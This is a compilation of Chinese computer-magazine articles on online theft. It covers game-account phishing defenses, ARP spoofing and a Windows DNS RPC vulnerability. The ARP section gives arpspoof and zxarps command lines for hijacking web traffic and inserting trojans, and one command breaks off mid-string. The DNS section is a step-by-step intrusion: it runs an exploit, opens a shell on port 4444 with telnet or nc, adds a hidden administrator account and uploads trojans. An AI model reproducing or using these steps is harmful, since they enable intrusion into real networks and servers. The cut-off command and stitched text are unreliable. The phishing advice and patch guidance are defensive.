如何防止网络财富被盗

  网络游戏、聊天工具和各种网络服务中流通的虚拟货币、虚拟物品等又被人称为虚拟财富,它已经可以和现实中的钱相互兑换,这也让它们产生了现实的价值。同时存在一群网络盗贼,他们对大家的虚拟财富虎视眈眈。虽然大家对虚拟财富小心谨慎,但是又找不到很好的方法来防范,造成了虚拟财富被盗的情况屡屡发生。当人们遗失虚拟财富后,总是懊恼不已,痛骂盗贼的卑鄙无耻。我们通过一些真实的案例来揭露盗贼使用的盗窃方法,让我们学会如何将虚拟财富保护好。
  高危人群:网络新手 损失程度:★★★★★
  出没区域:《魔兽世界》等主流网游 特点:名为馈赠,实则盗窃
偷的就是虚拟财富
  由于目前网络游戏的盛行,虚拟财产在很大程度上就是指网络游戏空间中存在的财物,包括游戏账号的等级、游戏货币、游戏人物拥有的各种装备等等,这些虚拟财产在一定条件下可以转换成现实生活中的财产。
  因为网络游戏的火爆,也增加了虚拟财富的火爆程度。在网上我们也随处可见各种虚拟财富的交易,90%以上的网络玩家都不同程度地参与了各种形式的虚拟财富交易。不久前,海口一名名叫阿海的高中生利用放假时间,瞒着家人以2500元的价格向网游中的“战友”购买了一把“屠龙刀”和一枚“戒指”,由此我们也可以看到虚拟财产在现实社会中的实际价值。
  既然虚拟财富这么有价值,那么就有不安好心的人对它虎视眈眈。wWW.iTCompUTER.COM.CN导致了虚拟财富被盗事件屡屡发生。在我们的调查数据中,40%以上的玩家曾经一次或者多次被盗取虚拟财富。
  在网络盗贼使用的手段中,最常见的就是网络骗子冒充游戏中的“管理员”,向大家发送诸如中奖、超值服务、账号维护等虚假消息,让玩家向他提供账号、密码。只要玩家稍微疏忽大意就会上当受骗。后果就是游戏中的装备、虚拟货币被洗劫一空,让你的财富变成他的财富。
  为何网络骗子喜欢冒充“管理员”,那是因为管理员在这些游戏中具有举足轻重的作用,因为他们面向玩家,是厂商和玩家沟通的一个重要桥梁,通常管理员会第一时间通知各种新年大优惠、公司周年庆、网络系统升级等信息。久而久之,玩家对带有“管理员”这个称号的人都相当信任,这也给网络骗子提供了空间。
  有数据表明,95%以上的网络游戏玩家都曾经收到过这些虚假消息,而在收到这些消息的玩家中,又有20%会上当受骗,导致游戏装备游戏币以及账号的丢失。
真实案例再现
  受害人:曾震
  损失金额:50000G币+上网时间+耗费精力≈3000元人民币
  2006年8月26日,《魔兽世界》的玩家小曾收到一封署名为“魔兽世界管理员”的电子邮件。邮件首先声称“由于游戏密码保护服务在功能上的不完善,加之部分用户遗忘了早期注册的密码保护资料,致使密码丢失后不能及时取回。为了解决日益严重的号码被盗问题,最大限度避免木马病毒等给游戏玩家带来的伤害,我们将在部分号码段试行新的实名密码保护系统”;接着让小曾填写一张和自己个人信息相关的表格,并且回复到指定的官方信箱(图1)。

  邮件末尾还特别提醒用户“填写此表格并成功递交,即表示您保证以上所填内容完全准确,并同意任意一项内容失效均有可能导致丧失权利。如果您的资料不正确,我们将不做任何回执也不再另行通知”。
  于是小曾立即按照邮件内容填写了自己的相关资料并发送到指定信箱,结果第二天上网他就发现自己魔兽账户中的五万G币居然不翼而飞了(G币为《魔兽世界》里面的虚拟货币单位,按照网上最低价格,1G币=0.05元人民币)。
案例剖析
  在本案例中除了诈骗者利欲熏心以外,游戏玩家自身也存在很多原因。首先这些玩家上网的目的就是为网络游戏而来,虽然各个网站常常刊登一些网络诈骗的介绍,但是由于小曾每天只是简单的处于“两耳不闻窗外事,一心只在游戏中”的状态中,所以很容易被诈骗者的花言巧语甚至恐吓所欺骗。
  其次很多游戏玩家网络安全意识不强,虽然知道网络中账户被盗常常发生,但是过于相信所谓的“官方管理员”以及“官方的客服邮箱”等信息。所以就盲目的相信邮件中的内容并填写了自己的相关资料,殊不知这些信息都是可以轻易的进行伪造的。
  我们通过在一些C2C交易平台进行搜索,发现在淘宝网最低可以用5分钱买到一个G币,易趣网最低可以用6分钱买到一个G币(图2)。甚至有人通过购买低价的点卡,直接到《魔兽世界》游戏里面大量的收购金币,然后拿到网上进行贩卖从而获取差价。

  而购买者也不管这些购买的游戏币是如何获取的,正是由于存在着各种各样的利益关系,游戏账户被盗的事件才频频发生。
四法则防范“管理员”偷钱
  针对网络骗子利用“管理员”身份进行诈骗的手段,我们可以利用
  下面四条法则进行防范。
第一法则:地址定位法
  通常,管理员都是有固定的使用账号,不可能时时刻刻更换自己的账号。例如腾讯QQ的网络管理员的账号就是10000,可是很多网络骗子就是利用这种特点,将自己账号的昵称改为10000,以此来鱼目混珠混淆视听。所以在面对这些所谓的“网络管理员”的时候,用户首先通过账号来分辨真假,接着利用其他的手段比如对骗子的IP地址进行分析。
  如果一个腾讯的网络管理员的IP地址对应的是北京,那么他肯定就是一个“李鬼”,因为地球人都知道腾讯公司在深圳。
第二法则:身份核实法
  本法则是针对官方论坛里面利用短消息来诈骗的防范方法。首先我们要查看该人的论坛级别,因为发布这些信息的一般都是论坛系统的总版主或总管理员。另外我们可以查看它的ID,总版主或总管理员的论坛ID都会很靠前的。
  其次既然是有活动的话,那么肯定会在论坛的显著位置告知大众,不可能把有奖活动搞得那么偷偷摸摸的。
第三法则:IP地址验身法
  本法则是针对利用电子邮件进行诈骗的应对方法,最简单的方法还是查看邮件的原始信息内容,找到“X-Originating-IP”这个项目内容后面的IP地址,它所代表的就是发信人的IP地址。然后再通过搜索引擎对这个IP地址所对应的实际地址进行查看,从而分析判断这个“网络管理员”身份的真假。
第四法则:官方验证法
  本法则是总的指导方针。当然无论面对哪种诈骗方法,我们最好的方法就是直接通过官方网站的客服热线进行确认,这样网络骗子的丑恶嘴脸就会立即大白于天下。
  当然这一切的前提是用户拨打的为真正的客服电话,而不是网络骗子钓鱼网站里面设置的虚假的客服电话。还有要提醒大家的是,任何网络公司都不会以任何借口、任何方式让用户提供账户密码、身份证件、密码保护资料等个人信息。

 
如何防止arp欺骗

  近期一种新型的“地址解析协议欺骗”(简称:ARP欺骗)攻击手段正在校园网中扩散,严重影响了包括校园网的各种类型局域网的正常运行。黑客通过伪造一个假的网关进行木马的散播,让局域网内的用户一上网就会连接有木马的地址,而用户唯一的感觉只是网络不畅通。那么ARP 欺骗是怎样的一种黑客攻击手段?普通的用户又该如何防范ARP 欺骗攻击呢?
“ARP 欺骗”的方式和原理
  从影响网络连接通畅的方式来看,ARP 欺骗大概可以分为两种。一种是对路由器ARP表的欺骗,这种方法可以破坏系统的ARP缓存表,从而造成内外IP地址的混乱。另一种是对局域网里面计算机的网关欺骗,让内网计算机系统的数据包通过假网关来发送。
  第一种ARP 欺骗的原理是截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行地址的更换,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,从而造成计算机访问黑客精心构建的网络陷阱。
  第二种ARP 欺骗的原理是伪造网关。它的原理是建立假网关,让被它欺骗的计算机向假网关发数据,而不是通过正常的路由器途径上网。在用户的角度看来,就是上不了网了以及网络掉线了,这样会给用户造成系统网关出错的假象。
如何利用“ARP 欺骗”入侵
  黑客要进行ARP 欺骗入侵只需要一个前提条件,就是进行入侵的计算机和被攻击的计算机要在一个局域网的网段中。由于ARP 欺骗是通过数据包进行欺骗的,所以在进行操作以前要在本地计算机安装一个驱动程序WinPcap(图1)。

  打开系统的命令提示符命令,并切换到利用工具所在的目录,接着执行利用工具命令:arpspoof.exe /n,然后会生成一个文本文件。现在打开这个文本文件后按照自己的需求进行编辑,比如可以将“Hack by cooldiyer”改为“该系统已经被我成功入侵!”(图2)。

  在命令提示符窗口输入命令:ArpSpoof 192.168.1.6 192.168.1.3 80 2 1 /r job.txt,其中192.168.1.6表示入侵计算机的IP地址,192.168.1.3表示被入侵计算机的IP地址,80表示用于欺骗的远程端口。
  后面的相关参数设置,用户应该根据自己网络网关的实际类型(例如有些网关地址为192.168.0.1,有些则是192.168. 110.1)情况进行设置。当准确键入以上命令后回车,程序就可以进行ARP 欺骗攻击(图3)。当其他用户访问这台服务器的80端口后,从浏览器看到的就是我们文本文件中的内容。

  刚才只是利用ARP 欺骗进行了网站攻击,现在利用另一款欺骗工具进行木马传播。在命令提示符窗口查看ARP 欺骗工具zxarps.exe的使用方法,然后键入命令:zxarps.exe -idx 0 -ip 192.168.1.7-192.168. 1.255 -port 80 -insert “

 
如何利用dns漏洞入侵

  DNS 是域名系统 (Domain Name System) 的缩写。大家在上网输入网址时,只有通过域名解析系统解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 2000和Windows 2003的DNS服务出现了一个级别极高的安全漏洞,如果被黑客成功利用的话,那么我们的上网操作将遇到巨大的麻烦。
  黑客姓名:张均诚
  黑客特长:Windows系统漏洞研究
  使用工具:DNS服务器漏洞利用工具
  黑客自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被黑客利用,那么系统就会被黑客完全控制。
DNS漏洞打开系统防线
  Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让黑客可以利用这种漏洞完全控制系统。黑客可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任何指令。
小知识:什么是RPC
  远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。
  此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很大麻烦。
  根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。
轻松利用DNS漏洞
  打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1)。

  在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次。
  当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功添加了一个用户名为pcw、密码为1234的用户。
  然后我们再在命令行输入:net localgroup administrators pcw /add,如果成功执行的话,就表示将该用户已经添加到管理员组(图3)。

  现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时远程管理操作了(图4)。

  如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,用FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
  由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址为:http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己的情况选择对应的补丁。
  同时,建议管理员采取如下措施以降低威胁程度。首先打开注册表编辑器,找到以下注册表位置HKEY_LOCAL_MACH INE\SYSTEM\CurrentControlSet\Services\ DNS\Parameters,通过右键菜单新建一个名为“RpcProtocol”的DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。
破解第20期《轻松拿下OBlog博客系统》攻击招数
  本周,一共有200位读者发来了破解第20期《轻松拿下OBlog博客系统》的招数。我们根据大家的破招描述和效果,最后评出来自广州的李国森为最佳防御者,他将获得50元的奖励,同时,还可再参加年度最佳防御者的评选。
别碰我的博客
  1. 根据OBlog系统提示安装漏洞补丁,注意事项查看http://www.oblog.cn/oblog/Oblogshow.htm。
  2. 更改js.asp的文件名,但其他页面的相应连接也会变成新文件名,还可以备份一个假的js.asp和数据库。
  3. 更换管理员页面的名字与位置。这是一个基本方法,但很管用。当然,网站不能设置成支持目录浏览。
  4. 把管理密码设得尽量复杂,位数也更长一点,且没什么意义最好,这样MD5破解网站的数据库时就不可能组合出你的密码。